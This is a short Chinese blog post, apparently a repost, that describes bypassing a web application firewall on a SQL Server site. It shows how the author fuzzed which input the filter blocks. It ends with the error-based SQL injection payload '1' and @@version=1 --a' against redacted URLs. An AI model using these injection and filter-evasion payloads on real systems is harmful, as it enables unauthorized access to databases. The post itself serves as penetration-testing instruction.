溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

一個非常簡單的WAF繞過。。

發(fā)布時間:2020-06-20 21:43:05 來源:網(wǎng)絡 閱讀:877 作者:z2pp 欄目:安全技術(shù)

0x00 前言

確實是非常簡單,如果是新手的話,我希望能給你帶來一些思路,老鳥的話就emm...

0x01 起因

工具掃到了一個有sqlserver特性的站點
一個非常簡單的WAF繞過。。
通常出現(xiàn)這種錯誤信息,說明該站點配置不當,錯誤信息會直接顯示,也沒用強制類型轉(zhuǎn)換的信息,那么一般就有報錯型注入了!來檢測一下
一個非常簡單的WAF繞過。。
卻出現(xiàn)了WAF的信息

0x02 fuzz

遇到WAF首先得先看看是什么關(guān)鍵字觸發(fā)了攔截請求,所以我們先進行簡單的調(diào)試

http://xxxx/xxxx.aspx?xxxx=1' and --a

一個非常簡單的WAF繞過。。
語法出錯是很正常的,因為我們添加了and且后面沒任何值,所以我們可以假設語句變成了

select xxx from xxx where xxxx=1' and --a

但我們發(fā)現(xiàn)其實并沒有觸發(fā)WAF,說明and關(guān)鍵字并沒有在過濾的列表當中,繼續(xù)嘗試

http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a

一個非常簡單的WAF繞過。。
竟然觸發(fā)了WAF,經(jīng)過多次調(diào)試,發(fā)現(xiàn)是and后面居然不能帶數(shù)字。。這樣就不會報錯了

http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a

一個非常簡單的WAF繞過。。
那么再次嘗試下原來的代碼,將順序調(diào)整,成功!

http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a

一個非常簡單的WAF繞過。。

一個非常簡單的WAF繞過。。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI